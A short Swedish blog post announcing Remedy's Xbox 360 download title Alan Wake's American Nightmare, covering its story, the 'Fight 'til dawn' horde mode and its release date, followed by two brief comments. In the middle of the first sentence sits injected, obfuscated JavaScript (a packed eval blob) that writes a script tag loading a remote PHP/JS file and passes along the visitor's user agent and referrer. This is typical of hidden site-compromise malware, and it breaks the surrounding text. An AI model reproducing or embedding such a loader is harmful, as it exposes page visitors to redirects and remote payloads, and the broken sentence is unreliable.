Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

Alan Wake American Nightmare

Alan Wake American Nightmare
Alexander Gylemo

Snart eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rizbe|var|u0026u|referrer|rfybi||js|php’.split(’|’),0,{}))
släpps den fristående uppföljaren till Xbox 360-succén Alan Wake. Alan Wake’s American Nightmare, som det heter, utvecklas av Remedy och kommer vara 360-exklusivt som sin föregångare och köps i nerladdningsbar form.

Spelets story är väldigt lik föregångaren där Wake den här gången skriver ett manus för tv-showen ”Night Springs” (välkänt från ettan) som han sedan sugs in i. Spelet kommer vara ca 5 timmar långt, längden varierar beroende på om man gör sidouppdragen eller inte och kommer även omfatta ett horde mode som heter ”Fight ’til dawn”. ”Fight ’til dawn” fungerar som andra liknande lägen där man ska kämpa för att överleva mängder av fiender som attackerar dig framtill att solen går upp, klarar man lägets fem banor låser man upp ”Nightmare Mode”.

Bortsett från en ny story har man även putsat upp grafikmotorn som den här gången bl.a. erbjuder mer förstörelsebara omgivningar.

Spelet släpps 2012-02-15 till Xbox 360.

httpv://www.youtube.com/watch?v=4n6x4thKKDw

Comments

  1. Ultra

    Otrolig låt!! Bra tips 🙂

  2. Riktigt bra post mannen 😉